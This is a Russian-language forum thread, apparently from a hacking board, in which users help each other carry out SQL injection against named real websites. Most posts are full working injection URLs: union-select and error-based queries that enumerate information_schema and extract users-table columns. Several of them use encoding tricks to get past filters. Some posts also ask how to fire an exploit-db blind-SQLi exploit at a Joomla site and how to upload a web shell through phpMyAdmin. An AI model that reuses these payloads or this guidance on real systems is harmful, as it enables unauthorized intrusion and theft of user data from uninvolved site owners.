Code: http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,?,4,5,6,7+from+users+limit+0,1-- не могу найти колонку с именем юзера
Code: http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name='users'-- или я что-то не так делаю?
зачарь http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,group_concat(column_name),4,5,6,7+from+information_schema.columns+where+table_name=char(117,115,101,114,115) users=char(117,115,101,114,115)
http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--
при нахождении столбцов через order_by и последующей комбинации их с union select вылетаешь ошибка Code: The used SELECT statements have a different number of columns что можно сделать?
2 запроса. Крути через ошибку. Или линк сюда. http://forum.antichat.net/thread43966.html последний пост от Scipio. Через ошибку: Code: http://www.cosmeticsdatabase.com/brand.php?brand_id=987%20or%201%20group%20by%20concat((select%20version()),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%201 С прямым выводом: Code: http://www.cosmeticsdatabase.com/ingredient.php?ingred06=-705545%20union%20select%201,2,3,4,5,6,7,8,version(),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+ Жмешь "QUOTE" и смотришь что он там написал в теге
Для начала надо сделать чтоб линк все видели: PHP: http://www.cosmeticsdatabase.com/brand.php?brand_id=987+union+select+1,2,3,4,5,6,7,8--
При проверке file_priv выдалось SELECT command denied to user 'g4rt'@'localhost' for table 'user' это типа в доступе к file_priv отказано, да?
Это значит что отказано в доступе к базе данных под именем "mysql" и к таблице "mysql.user" в частности, соответственно, в большинстве случаев file_priv тоже нет.
Привет всем! В общем захотелось заняться пентестом джумлы) нашел на сайте уязвимый Joomla Kunena Forums также для него нашел эксплойт под BSQL http://www.exploit-db.com/exploits/9408/ Подскажите пожалуйста как заюзать эксплойт? в эксплойте написано понятно что юзать скрипт надо по шаблону вида exploit.php?site=http://joomlasite.... но вот не понятно на какую именно страницу надо передавать! Может кто пояснить?
на страницу, в которой есть уязвимый параметр. и передавать нужно последним параметр(в случае если их несколько)
http://minysa.ru/infusions/mp3/song.php?song_id=-340'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--' При вставке слов страница не загружается, как обойти?
скобки нельзя использовать Code: http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14%20,15,16,17,18,19--%27 предсказывая следующий вопрос, можно сделать так: Code: http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14%20,15,16,17,18,19+from+information_schema.tables+limit+17,1--%20%27
Возможно ли вотэто как либо использовать? http://www.gamereplays.org/community/index.php?act=SF&f=99999999
Нет, данная переменная принимает только числа. Может начнем статьи читать и немного изучим PHP + MySQL? //и начнём читать статьи прежде чем задать вопрос
можно ли через phpmyadmin 2.8.0.3 залить шелл не зная полного пути? с примером пожалуйста Объясните плиз вот это https://forum.antichat.ru/showpost.php?p=1323558&postcount=12
